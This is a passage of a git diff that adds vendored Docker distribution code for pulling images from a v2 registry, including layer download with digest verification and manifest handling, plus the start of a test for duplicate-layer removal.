+func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (err error) {
+	var layersDownloaded bool
+	if !reference.IsNameOnly(ref) {
+		layersDownloaded, err = p.pullV2Tag(ctx, ref)
+		if err != nil {
+			return err
+		}
+	} else {
+		tags, err := p.repo.Tags(ctx).All(ctx)
+		if err != nil {
+			// If this repository doesn't exist on V2, we should
+			// permit a fallback to V1.
+			return allowV1Fallback(err)
+		}
+
+		// The v2 registry knows about this repository, so we will not
+		// allow fallback to the v1 protocol even if we encounter an
+		// error later on.
+		p.confirmedV2 = true
+
+		for _, tag := range tags {
+			tagRef, err := reference.WithTag(ref, tag)
+			if err != nil {
+				return err
+			}
+			pulledNew, err := p.pullV2Tag(ctx, tagRef)
+			if err != nil {
+				// Since this is the pull-all-tags case, don't
+				// allow an error pulling a particular tag to
+				// make the whole pull fall back to v1.
+				if fallbackErr, ok := err.(fallbackError); ok {
+					return fallbackErr.err
+				}
+				return err
+			}
+			// pulledNew is true if either new layers were downloaded OR if existing images were newly tagged
+			// TODO(tiborvass): should we change the name of `layersDownload`? What about message in WriteStatus?
+			layersDownloaded = layersDownloaded || pulledNew
+		}
+	}
+
+	writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded)
+
+	return nil
+}
+
+type v2LayerDescriptor struct {
+	digest            digest.Digest
+	repoInfo          *registry.RepositoryInfo
+	repo              distribution.Repository
+	V2MetadataService metadata.V2MetadataService
+	tmpFile           *os.File
+	verifier          digest.Verifier
+	src               distribution.Descriptor
+}
+
+func (ld *v2LayerDescriptor) Key() string {
+	return "v2:" + ld.digest.String()
+}
+
+func (ld *v2LayerDescriptor) ID() string {
+	return stringid.TruncateID(ld.digest.String())
+}
+
+func (ld *v2LayerDescriptor) DiffID() (layer.DiffID, error) {
+	return ld.V2MetadataService.GetDiffID(ld.digest)
+}
+
+func (ld *v2LayerDescriptor) Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error) {
+	logrus.Debugf("pulling blob %q", ld.digest)
+
+	var (
+		err    error
+		offset int64
+	)
+
+	if ld.tmpFile == nil {
+		ld.tmpFile, err = createDownloadFile()
+		if err != nil {
+			return nil, 0, xfer.DoNotRetry{Err: err}
+		}
+	} else {
+		offset, err = ld.tmpFile.Seek(0, os.SEEK_END)
+		if err != nil {
+			logrus.Debugf("error seeking to end of download file: %v", err)
+			offset = 0
+
+			ld.tmpFile.Close()
+			if err := os.Remove(ld.tmpFile.Name()); err != nil {
+				logrus.Errorf("Failed to remove temp file: %s", ld.tmpFile.Name())
+			}
+			ld.tmpFile, err = createDownloadFile()
+			if err != nil {
+				return nil, 0, xfer.DoNotRetry{Err: err}
+			}
+		} else if offset != 0 {
+			logrus.Debugf("attempting to resume download of %q from %d bytes", ld.digest, offset)
+		}
+	}
+
+	tmpFile := ld.tmpFile
+
+	layerDownload, err := ld.open(ctx)
+	if err != nil {
+		logrus.Errorf("Error initiating layer download: %v", err)
+		return nil, 0, retryOnError(err)
+	}
+
+	if offset != 0 {
+		_, err := layerDownload.Seek(offset, os.SEEK_SET)
+		if err != nil {
+			if err := ld.truncateDownloadFile(); err != nil {
+				return nil, 0, xfer.DoNotRetry{Err: err}
+			}
+			return nil, 0, err
+		}
+	}
+	size, err := layerDownload.Seek(0, os.SEEK_END)
+	if err != nil {
+		// Seek failed, perhaps because there was no Content-Length
+		// header. This shouldn't fail the download, because we can
+		// still continue without a progress bar.
+		size = 0
+	} else {
+		if size != 0 && offset > size {
+			logrus.Debug("Partial download is larger than full blob. Starting over")
+			offset = 0
+			if err := ld.truncateDownloadFile(); err != nil {
+				return nil, 0, xfer.DoNotRetry{Err: err}
+			}
+		}
+
+		// Restore the seek offset either at the beginning of the
+		// stream, or just after the last byte we have from previous
+		// attempts.
+		_, err = layerDownload.Seek(offset, os.SEEK_SET)
+		if err != nil {
+			return nil, 0, err
+		}
+	}
+
+	reader := progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, layerDownload), progressOutput, size-offset, ld.ID(), "Downloading")
+	defer reader.Close()
+
+	if ld.verifier == nil {
+		ld.verifier, err = digest.NewDigestVerifier(ld.digest)
+		if err != nil {
+			return nil, 0, xfer.DoNotRetry{Err: err}
+		}
+	}
+
+	_, err = io.Copy(tmpFile, io.TeeReader(reader, ld.verifier))
+	if err != nil {
+		if err == transport.ErrWrongCodeForByteRange {
+			if err := ld.truncateDownloadFile(); err != nil {
+				return nil, 0, xfer.DoNotRetry{Err: err}
+			}
+			return nil, 0, err
+		}
+		return nil, 0, retryOnError(err)
+	}
+
+	progress.Update(progressOutput, ld.ID(), "Verifying Checksum")
+
+	if !ld.verifier.Verified() {
+		err = fmt.Errorf("filesystem layer verification failed for digest %s", ld.digest)
+		logrus.Error(err)
+
+		// Allow a retry if this digest verification error happened
+		// after a resumed download.
+		if offset != 0 {
+			if err := ld.truncateDownloadFile(); err != nil {
+				return nil, 0, xfer.DoNotRetry{Err: err}
+			}
+
+			return nil, 0, err
+		}
+		return nil, 0, xfer.DoNotRetry{Err: err}
+	}
+
+	progress.Update(progressOutput, ld.ID(), "Download complete")
+
+	logrus.Debugf("Downloaded %s to tempfile %s", ld.ID(), tmpFile.Name())
+
+	_, err = tmpFile.Seek(0, os.SEEK_SET)
+	if err != nil {
+		tmpFile.Close()
+		if err := os.Remove(tmpFile.Name()); err != nil {
+			logrus.Errorf("Failed to remove temp file: %s", tmpFile.Name())
+		}
+		ld.tmpFile = nil
+		ld.verifier = nil
+		return nil, 0, xfer.DoNotRetry{Err: err}
+	}
+
+	// hand off the temporary file to the download manager, so it will only
+	// be closed once
+	ld.tmpFile = nil
+
+	return ioutils.NewReadCloserWrapper(tmpFile, func() error {
+		tmpFile.Close()
+		err := os.RemoveAll(tmpFile.Name())
+		if err != nil {
+			logrus.Errorf("Failed to remove temp file: %s", tmpFile.Name())
+		}
+		return err
+	}), size, nil
+}
+
+func (ld *v2LayerDescriptor) Close() {
+	if ld.tmpFile != nil {
+		ld.tmpFile.Close()
+		if err := os.RemoveAll(ld.tmpFile.Name()); err != nil {
+			logrus.Errorf("Failed to remove temp file: %s", ld.tmpFile.Name())
+		}
+	}
+}
+
+func (ld *v2LayerDescriptor) truncateDownloadFile() error {
+	// Need a new hash context since we will be redoing the download
+	ld.verifier = nil
+
+	if _, err := ld.tmpFile.Seek(0, os.SEEK_SET); err != nil {
+		logrus.Errorf("error seeking to beginning of download file: %v", err)
+		return err
+	}
+
+	if err := ld.tmpFile.Truncate(0); err != nil {
+		logrus.Errorf("error truncating download file: %v", err)
+		return err
+	}
+
+	return nil
+}
+
+func (ld *v2LayerDescriptor) Registered(diffID layer.DiffID) {
+	// Cache mapping from this layer's DiffID to the blobsum
+	ld.V2MetadataService.Add(diffID, metadata.V2Metadata{Digest: ld.digest, SourceRepository: ld.repoInfo.FullName()})
+}
+
+func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdated bool, err error) {
+	manSvc, err := p.repo.Manifests(ctx)
+	if err != nil {
+		return false, err
+	}
+
+	var (
+		manifest    distribution.Manifest
+		tagOrDigest string // Used for logging/progress only
+	)
+	if tagged, isTagged := ref.(reference.NamedTagged); isTagged {
+		manifest, err = manSvc.Get(ctx, "", distribution.WithTag(tagged.Tag()))
+		if err != nil {
+			return false, allowV1Fallback(err)
+		}
+		tagOrDigest = tagged.Tag()
+	} else if digested, isDigested := ref.(reference.Canonical); isDigested {
+		manifest, err = manSvc.Get(ctx, digested.Digest())
+		if err != nil {
+			return false, err
+		}
+		tagOrDigest = digested.Digest().String()
+	} else {
+		return false, fmt.Errorf("internal error: reference has neither a tag nor a digest: %s", ref.String())
+	}
+
+	if manifest == nil {
+		return false, fmt.Errorf("image manifest does not exist for tag or digest %q", tagOrDigest)
+	}
+
+	if m, ok := manifest.(*schema2.DeserializedManifest); ok {
+		var allowedMediatype bool
+		for _, t := range p.config.Schema2Types {
+			if m.Manifest.Config.MediaType == t {
+				allowedMediatype = true
+				break
+			}
+		}
+		if !allowedMediatype {
+			configClass := mediaTypeClasses[m.Manifest.Config.MediaType]
+			if configClass == "" {
+				configClass = "unknown"
+			}
+			return false, fmt.Errorf("target is %s", configClass)
+		}
+	}
+
+	// If manSvc.Get succeeded, we can be confident that the registry on
+	// the other side speaks the v2 protocol.
+	p.confirmedV2 = true
+
+	logrus.Debugf("Pulling ref from V2 registry: %s", ref.String())
+	progress.Message(p.config.ProgressOutput, tagOrDigest, "Pulling from "+p.repo.Named().Name())
+
+	var (
+		id             digest.Digest
+		manifestDigest digest.Digest
+	)
+
+	switch v := manifest.(type) {
+	case *schema1.SignedManifest:
+		if p.config.RequireSchema2 {
+			return false, fmt.Errorf("invalid manifest: not schema2")
+		}
+		id, manifestDigest, err = p.pullSchema1(ctx, ref, v)
+		if err != nil {
+			return false, err
+		}
+	case *schema2.DeserializedManifest:
+		id, manifestDigest, err = p.pullSchema2(ctx, ref, v)
+		if err != nil {
+			return false, err
+		}
+	case *manifestlist.DeserializedManifestList:
+		id, manifestDigest, err = p.pullManifestList(ctx, ref, v)
+		if err != nil {
+			return false, err
+		}
+	default:
+		return false, errors.New("unsupported manifest format")
+	}
+
+	progress.Message(p.config.ProgressOutput, "", "Digest: "+manifestDigest.String())
+
+	if p.config.ReferenceStore != nil {
+		oldTagID, err := p.config.ReferenceStore.Get(ref)
+		if err == nil {
+			if oldTagID == id {
+				return false, addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id)
+			}
+		} else if err != reference.ErrDoesNotExist {
+			return false, err
+		}
+
+		if canonical, ok := ref.(reference.Canonical); ok {
+			if err = p.config.ReferenceStore.AddDigest(canonical, id, true); err != nil {
+				return false, err
+			}
+		} else {
+			if err = addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id); err != nil {
+				return false, err
+			}
+			if err = p.config.ReferenceStore.AddTag(ref, id, true); err != nil {
+				return false, err
+			}
+		}
+	}
+	return true, nil
+}
+
+func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverifiedManifest *schema1.SignedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) {
+	var verifiedManifest *schema1.Manifest
+	verifiedManifest, err = verifySchema1Manifest(unverifiedManifest, ref)
+	if err != nil {
+		return "", "", err
+	}
+
+	rootFS := image.NewRootFS()
+
+	// remove duplicate layers and check parent chain validity
+	err = fixManifestLayers(verifiedManifest)
+	if err != nil {
+		return "", "", err
+	}
+
+	var descriptors []xfer.DownloadDescriptor
+
+	// Image history converted to the new format
+	var history []image.History
+
+	// Note that the order of this loop is in the direction of bottom-most
+	// to top-most, so that the downloads slice gets ordered correctly.
+	for i := len(verifiedManifest.FSLayers) - 1; i >= 0; i-- {
+		blobSum := verifiedManifest.FSLayers[i].BlobSum
+
+		var throwAway struct {
+			ThrowAway bool `json:"throwaway,omitempty"`
+		}
+		if err := json.Unmarshal([]byte(verifiedManifest.History[i].V1Compatibility), &throwAway); err != nil {
+			return "", "", err
+		}
+
+		h, err := v1.HistoryFromConfig([]byte(verifiedManifest.History[i].V1Compatibility), throwAway.ThrowAway)
+		if err != nil {
+			return "", "", err
+		}
+		history = append(history, h)
+
+		if throwAway.ThrowAway {
+			continue
+		}
+
+		layerDescriptor := &v2LayerDescriptor{
+			digest:            blobSum,
+			repoInfo:          p.repoInfo,
+			repo:              p.repo,
+			V2MetadataService: p.V2MetadataService,
+		}
+
+		descriptors = append(descriptors, layerDescriptor)
+	}
+
+	resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, p.config.ProgressOutput)
+	if err != nil {
+		return "", "", err
+	}
+	defer release()
+
+	config, err := v1.MakeConfigFromV1Config([]byte(verifiedManifest.History[0].V1Compatibility), &resultRootFS, history)
+	if err != nil {
+		return "", "", err
+	}
+
+	imageID, err := p.config.ImageStore.Put(config)
+	if err != nil {
+		return "", "", err
+	}
+
+	manifestDigest = digest.FromBytes(unverifiedManifest.Canonical)
+
+	return imageID, manifestDigest, nil
+}
+
+func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *schema2.DeserializedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) {
+	manifestDigest, err = schema2ManifestDigest(ref, mfst)
+	if err != nil {
+		return "", "", err
+	}
+
+	target := mfst.Target()
+	if _, err := p.config.ImageStore.Get(target.Digest); err == nil {
+		// If the image already exists locally, no need to pull
+		// anything.
+		return target.Digest, manifestDigest, nil
+	}
+
+	var descriptors []xfer.DownloadDescriptor
+
+	// Note that the order of this loop is in the direction of bottom-most
+	// to top-most, so that the downloads slice gets ordered correctly.
+	for _, d := range mfst.Layers {
+		layerDescriptor := &v2LayerDescriptor{
+			digest:            d.Digest,
+			repo:              p.repo,
+			repoInfo:          p.repoInfo,
+			V2MetadataService: p.V2MetadataService,
+			src:               d,
+		}
+
+		descriptors = append(descriptors, layerDescriptor)
+	}
+
+	configChan := make(chan []byte, 1)
+	errChan := make(chan error, 1)
+	var cancel func()
+	ctx, cancel = context.WithCancel(ctx)
+
+	// Pull the image config
+	go func() {
+		configJSON, err := p.pullSchema2Config(ctx, target.Digest)
+		if err != nil {
+			errChan <- ImageConfigPullError{Err: err}
+			cancel()
+			return
+		}
+		configChan <- configJSON
+	}()
+
+	var (
+		configJSON       []byte        // raw serialized image config
+		downloadedRootFS *image.RootFS // rootFS from registered layers
+		configRootFS     *image.RootFS // rootFS from configuration
+	)
+
+	// https://github.com/docker/docker/issues/24766 - Err on the side of caution,
+	// explicitly blocking images intended for linux from the Windows daemon. On
+	// Windows, we do this before the attempt to download, effectively serialising
+	// the download slightly slowing it down. We have to do it this way, as
+	// chances are the download of layers itself would fail due to file names
+	// which aren't suitable for NTFS. At some point in the future, if a similar
+	// check to block Windows images being pulled on Linux is implemented, it
+	// may be necessary to perform the same type of serialisation.
+	if runtime.GOOS == "windows" {
+		configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan)
+		if err != nil {
+			return "", "", err
+		}
+
+		if configRootFS == nil {
+			return "", "", errRootFSInvalid
+		}
+	}
+
+	if p.config.DownloadManager != nil {
+		downloadRootFS := *image.NewRootFS()
+		rootFS, release, err := p.config.DownloadManager.Download(ctx, downloadRootFS, descriptors, p.config.ProgressOutput)
+		if err != nil {
+			if configJSON != nil {
+				// Already received the config
+				return "", "", err
+			}
+			select {
+			case err = <-errChan:
+				return "", "", err
+			default:
+				cancel()
+				select {
+				case <-configChan:
+				case <-errChan:
+				}
+				return "", "", err
+			}
+		}
+		if release != nil {
+			defer release()
+		}
+
+		downloadedRootFS = &rootFS
+	}
+
+	if configJSON == nil {
+		configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan)
+		if err != nil {
+			return "", "", err
+		}
+
+		if configRootFS == nil {
+			return "", "", errRootFSInvalid
+		}
+	}
+
+	if downloadedRootFS != nil {
+		// The DiffIDs returned in rootFS MUST match those in the config.
+		// Otherwise the image config could be referencing layers that aren't
+		// included in the manifest.
+		if len(downloadedRootFS.DiffIDs) != len(configRootFS.DiffIDs) {
+			return "", "", errRootFSMismatch
+		}
+
+		for i := range downloadedRootFS.DiffIDs {
+			if downloadedRootFS.DiffIDs[i] != configRootFS.DiffIDs[i] {
+				return "", "", errRootFSMismatch
+			}
+		}
+	}
+
+	imageID, err := p.config.ImageStore.Put(configJSON)
+	if err != nil {
+		return "", "", err
+	}
+
+	return imageID, manifestDigest, nil
+}
+
+func receiveConfig(s ImageConfigStore, configChan <-chan []byte, errChan <-chan error) ([]byte, *image.RootFS, error) {
+	select {
+	case configJSON := <-configChan:
+		rootfs, err := s.RootFSFromConfig(configJSON)
+		if err != nil {
+			return nil, nil, err
+		}
+		return configJSON, rootfs, nil
+	case err := <-errChan:
+		return nil, nil, err
+		// Don't need a case for ctx.Done in the select because cancellation
+		// will trigger an error in p.pullSchema2ImageConfig.
+	}
+}
+
+// pullManifestList handles "manifest lists" which point to various
+// platform-specifc manifests.
+func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mfstList *manifestlist.DeserializedManifestList) (id digest.Digest, manifestListDigest digest.Digest, err error) {
+	manifestListDigest, err = schema2ManifestDigest(ref, mfstList)
+	if err != nil {
+		return "", "", err
+	}
+
+	var manifestDigest digest.Digest
+	for _, manifestDescriptor := range mfstList.Manifests {
+		// TODO(aaronl): The manifest list spec supports optional
+		// "features" and "variant" fields. These are not yet used.
+		// Once they are, their values should be interpreted here.
+		if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == runtime.GOOS {
+			manifestDigest = manifestDescriptor.Digest
+			break
+		}
+	}
+
+	if manifestDigest == "" {
+		return "", "", errors.New("no supported platform found in manifest list")
+	}
+
+	manSvc, err := p.repo.Manifests(ctx)
+	if err != nil {
+		return "", "", err
+	}
+
+	manifest, err := manSvc.Get(ctx, manifestDigest)
+	if err != nil {
+		return "", "", err
+	}
+
+	manifestRef, err := reference.WithDigest(reference.TrimNamed(ref), manifestDigest)
+	if err != nil {
+		return "", "", err
+	}
+
+	switch v := manifest.(type) {
+	case *schema1.SignedManifest:
+		id, _, err = p.pullSchema1(ctx, manifestRef, v)
+		if err != nil {
+			return "", "", err
+		}
+	case *schema2.DeserializedManifest:
+		id, _, err = p.pullSchema2(ctx, manifestRef, v)
+		if err != nil {
+			return "", "", err
+		}
+	default:
+		return "", "", errors.New("unsupported manifest format")
+	}
+
+	return id, manifestListDigest, err
+}
+
+func (p *v2Puller) pullSchema2Config(ctx context.Context, dgst digest.Digest) (configJSON []byte, err error) {
+	blobs := p.repo.Blobs(ctx)
+	configJSON, err = blobs.Get(ctx, dgst)
+	if err != nil {
+		return nil, err
+	}
+
+	// Verify image config digest
+	verifier, err := digest.NewDigestVerifier(dgst)
+	if err != nil {
+		return nil, err
+	}
+	if _, err := verifier.Write(configJSON); err != nil {
+		return nil, err
+	}
+	if !verifier.Verified() {
+		err := fmt.Errorf("image config verification failed for digest %s", dgst)
+		logrus.Error(err)
+		return nil, err
+	}
+
+	return configJSON, nil
+}
+
+// schema2ManifestDigest computes the manifest digest, and, if pulling by
+// digest, ensures that it matches the requested digest.
+func schema2ManifestDigest(ref reference.Named, mfst distribution.Manifest) (digest.Digest, error) {
+	_, canonical, err := mfst.Payload()
+	if err != nil {
+		return "", err
+	}
+
+	// If pull by digest, then verify the manifest digest.
+	if digested, isDigested := ref.(reference.Canonical); isDigested {
+		verifier, err := digest.NewDigestVerifier(digested.Digest())
+		if err != nil {
+			return "", err
+		}
+		if _, err := verifier.Write(canonical); err != nil {
+			return "", err
+		}
+		if !verifier.Verified() {
+			err := fmt.Errorf("manifest verification failed for digest %s", digested.Digest())
+			logrus.Error(err)
+			return "", err
+		}
+		return digested.Digest(), nil
+	}
+
+	return digest.FromBytes(canonical), nil
+}
+
+// allowV1Fallback checks if the error is a possible reason to fallback to v1
+// (even if confirmedV2 has been set already), and if so, wraps the error in
+// a fallbackError with confirmedV2 set to false. Otherwise, it returns the
+// error unmodified.
+func allowV1Fallback(err error) error {
+	switch v := err.(type) {
+	case errcode.Errors:
+		if len(v) != 0 {
+			if v0, ok := v[0].(errcode.Error); ok && shouldV2Fallback(v0) {
+				return fallbackError{
+					err:         err,
+					confirmedV2: false,
+					transportOK: true,
+				}
+			}
+		}
+	case errcode.Error:
+		if shouldV2Fallback(v) {
+			return fallbackError{
+				err:         err,
+				confirmedV2: false,
+				transportOK: true,
+			}
+		}
+	case *url.Error:
+		if v.Err == auth.ErrNoBasicAuthCredentials {
+			return fallbackError{err: err, confirmedV2: false}
+		}
+	}
+
+	return err
+}
+
+func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference.Named) (m *schema1.Manifest, err error) {
+	// If pull by digest, then verify the manifest digest. NOTE: It is
+	// important to do this first, before any other content validation. If the
+	// digest cannot be verified, don't even bother with those other things.
+	if digested, isCanonical := ref.(reference.Canonical); isCanonical {
+		verifier, err := digest.NewDigestVerifier(digested.Digest())
+		if err != nil {
+			return nil, err
+		}
+		if _, err := verifier.Write(signedManifest.Canonical); err != nil {
+			return nil, err
+		}
+		if !verifier.Verified() {
+			err := fmt.Errorf("image verification failed for digest %s", digested.Digest())
+			logrus.Error(err)
+			return nil, err
+		}
+	}
+	m = &signedManifest.Manifest
+
+	if m.SchemaVersion != 1 {
+		return nil, fmt.Errorf("unsupported schema version %d for %q", m.SchemaVersion, ref.String())
+	}
+	if len(m.FSLayers) != len(m.History) {
+		return nil, fmt.Errorf("length of history not equal to number of layers for %q", ref.String())
+	}
+	if len(m.FSLayers) == 0 {
+		return nil, fmt.Errorf("no FSLayers in manifest for %q", ref.String())
+	}
+	return m, nil
+}
+
+// fixManifestLayers removes repeated layers from the manifest and checks the
+// correctness of the parent chain.
+func fixManifestLayers(m *schema1.Manifest) error {
+	imgs := make([]*image.V1Image, len(m.FSLayers))
+	for i := range m.FSLayers {
+		img := &image.V1Image{}
+
+		if err := json.Unmarshal([]byte(m.History[i].V1Compatibility), img); err != nil {
+			return err
+		}
+
+		imgs[i] = img
+		if err := v1.ValidateID(img.ID); err != nil {
+			return err
+		}
+	}
+
+	if imgs[len(imgs)-1].Parent != "" && runtime.GOOS != "windows" {
+		// Windows base layer can point to a base layer parent that is not in manifest.
+		return errors.New("invalid parent ID in the base layer of the image")
+	}
+
+	// check general duplicates to error instead of a deadlock
+	idmap := make(map[string]struct{})
+
+	var lastID string
+	for _, img := range imgs {
+		// skip IDs that appear after each other, we handle those later
+		if _, exists := idmap[img.ID]; img.ID != lastID && exists {
+			return fmt.Errorf("ID %+v appears multiple times in manifest", img.ID)
+		}
+		lastID = img.ID
+		idmap[lastID] = struct{}{}
+	}
+
+	// backwards loop so that we keep the remaining indexes after removing items
+	for i := len(imgs) - 2; i >= 0; i-- {
+		if imgs[i].ID == imgs[i+1].ID { // repeated ID. remove and continue
+			m.FSLayers = append(m.FSLayers[:i], m.FSLayers[i+1:]...)
+			m.History = append(m.History[:i], m.History[i+1:]...)
+		} else if imgs[i].Parent != imgs[i+1].ID {
+			return fmt.Errorf("Invalid parent ID. Expected %v, got %v.", imgs[i+1].ID, imgs[i].Parent)
+		}
+	}
+
+	return nil
+}
+
+func createDownloadFile() (*os.File, error) {
+	return ioutil.TempFile("", "GetImageBlob")
+}
diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_test.go b/vendor/github.com/docker/docker/distribution/pull_v2_test.go
new file mode 100644
index 0000000000..b745642e3b
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/pull_v2_test.go
@@ -0,0 +1,183 @@
+package distribution
+
+import (
+	"encoding/json"
+	"io/ioutil"
+	"reflect"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/manifest/schema1"
+	"github.com/docker/docker/reference"
+)
+
+// TestFixManifestLayers checks that fixManifestLayers removes a duplicate
+// layer, and that it makes no changes to the manifest when called a second
+// time, after the duplicate is removed.
+func TestFixManifestLayers(t *testing.T) {
+	duplicateLayerManifest := schema1.Manifest{
+		FSLayers: []schema1.FSLayer{
+			{BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")},
+			{BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")},
+			{BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")},
+		},
+		History: []schema1.History{
+			{V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"},
+			{V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"},
+			{V1Compatibility: "{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026     go get -v github.com/tools/godep \\u0026\\u0026     godep restore \\u0026\\u0026     go install -ldflags \\\"-X main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain --untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" 